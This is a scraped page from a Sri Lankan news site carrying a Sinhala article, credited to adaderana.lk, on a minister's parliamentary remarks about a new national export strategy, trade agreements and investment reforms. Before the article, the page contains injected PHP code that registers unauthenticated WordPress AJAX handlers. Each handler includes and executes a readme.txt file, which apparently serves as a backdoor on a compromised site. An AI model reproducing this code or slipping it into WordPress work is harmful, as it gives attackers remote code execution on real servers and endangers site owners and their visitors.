if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } නව ජාතික අපනයන ක්‍රමෝපායක් සකස් කරනවා - mediahumanrights.lk
mediahumanrights.lk
Business Business News News

නව ජාතික අපනයන ක්‍රමෝපායක් සකස් කරනවා

රජය මෙරට ව්‍යාපාර පරිසරය වැඩිදියුණු කිරීමට කටයුතු කර තිබෙනවා. නව ජාතික අපනයන ක්‍රමෝපායක් සකස් කිරීමට කටයුතු කරනවා යැයි සංවර්ධන උපාය මාර්ග හා ජාත්‍යන්තර වෙළඳ අමාත්‍ය මලික් සමරවික්‍රම මහතා පවසයි.
අමාත්‍යවරයා අද (20) පාර්ලිමේන්තුවේ දී ප්‍රකාශ කළේ, සංවර්ධන උපාය මාර්ග හා ජාත්‍යන්තර වෙළඳ අමාත්‍යාංශයේ වැයශීර්ෂ විවාදයට එක්වෙමිනි.
ප්‍රගතිශීලී අයවැයක් ඉදිරිපත් කර තිබෙනවා. අපේ රට ලෝකයට විවෘත කිරීමට අවධානය යොමු කර තිබෙනවා. අපේ රජය දේශීය යටිතල සඳහා වියදම් කරනවාට වෙනුවට සෘජු විදේශ ආයෝජන සඳහා යොමු කර තිබෙනවා.
අපිට මේ ආර්ථික වර්ධනයට ම පෞද්ගලික අංශය අවශ්‍ය වෙනවා. සියයට 99%ක් ආයතන කුඩා හා මධ්‍යම ව්‍යාපාරයි.
ව්‍යාවසායකන්ට හොඳ පරිසරයක් සකස් කර දෙනවා කියලා ඔවුන්ට විශ්වාසය ගොඩනැගිය යුතුයි. අපේ අමාත්‍යාංශය මේ අංශ දියුණු කරන්න අවධනාය යොමු කර තිබෙනවා.රැකියා දිරි ගැන්වීම,නාවීන හා නිදහස් වෙළඳාමක් හඳුන්වදීමට බලාපොරොත්තු වෙනවා.ද්විපාර්ශවීය ගිවිසුම් වැදගත් වෙනවා. අපට පිළිගන්න වෙනවා. ඉන්දියාව සීග්‍රයෙන් වර්ධනය වන ආර්ථිකයක් තිබෙනවා.ඉට්කා සාර්ථකව සාක්ච්ඡා වෙනවා.ඇඟළුම් ක්ෂේත්‍රය ගත් විට මිලියන 400ක වෙළඳ ගනුදෙනු සිදු වි හැකියි. සිංගප්පූරුව සමඟ නිදහස් වෙළඳ ගිවිසුම 2018 ජනවාරි මාසයේ අත්සන් කිරීමට නියමිතයි.
ශ්‍රී ලංකාවේ ආයෝජනය වර්ධනය වන මට්ටමක තිබෙනවා. විනිවිධභාවය යුතුව තීරණය ගෙන තිවෙනවා.අප ආයෝජන පහසුකම් සැකසීමේ කමිටුව මඟින් ආකර්ෂණය කරන වැඩපිළිවෙලක් සකස් කරනවා. 2018 දී සමාගම ලියාපදිංචි කිරීම එක් දිනකින් කරන්න කටයුතු කර තිබෙනවා. ඉදිකිරීම් බලපත්‍ර ලබාගැනීමේ කාලය අඩු කරනවා. ආර්ථිකය විවිධාංගිකරණය හා සේවා ඇති කිරීම වැදගත්වෙනවා.අප නව අපනයන හා ආයෝජන ක්ෂේත්‍ර වැඩිදියුණු කරන්න කටයුතු කරනවා හ නව ජාතික අපනයන ක්‍රමෝපායක් සකස් කිරීමට කටයුතු කරනවා. ශ්‍රී ලංකාව ජාත්‍යන්තර ප්‍රජාවේ පිළිගැනීමට ලක්වීමට විවිධ ගිවිසුම්වලට ඇතුළත් වීමට අවස්ථාව ලැබී තිබෙනවා. ක්‍රියාකාරි සැලසුම් සෑම අංශයකට සකස් කර තිබෙනවා. ඕස්ට්‍රේලියාව සමඟ වෙලඳ හා ආයෝජන පිළිබඳව යම් යම් එකඟතාවලට පැමිණියා.
මේ රටේ ජනතාව ජී.එස්.පී.ප්ලස් ලබාගැනීම භුක්ති විදිනවා. නව ආර්ථික කර්මාන්ත ඇති කිරීමෙන් නව රැකියා අවස්ථා ඇති කිරීමට හැකියාව ලැබෙනවා. ශ්‍රී ලංකාවට ලොව වටිනාකම් දාමයට ඇතුළත් වීමේ හැකියාව ලැබෙනවා බවද අමාත්‍යවරයා පැවසී ය.

(under the courtesy of adaderana.lk news web)

Related posts

දිස්ත‍්‍රික්ක 19 ක 20දා සිට ඇඳිරියත් ඉවතට – ගුවන් තොටත් ඇරේ රජයේ ආයතනත් ටික ටික වැඩ

Shiran Viraj

පසුගිය සමයේ පුද්ගලික සමාගමක් එංගලන්තයෙන් ගෙන්වූ කුණු තොගය යළිත් එංගලන්තයටම යවයි

Shiran Viraj

සඳුදා සිට කොටස් වෙළෙඳපොළ විවෘතයි. ගනුදෙනු පැය 2කට සීමාවෙයි

Shiran Viraj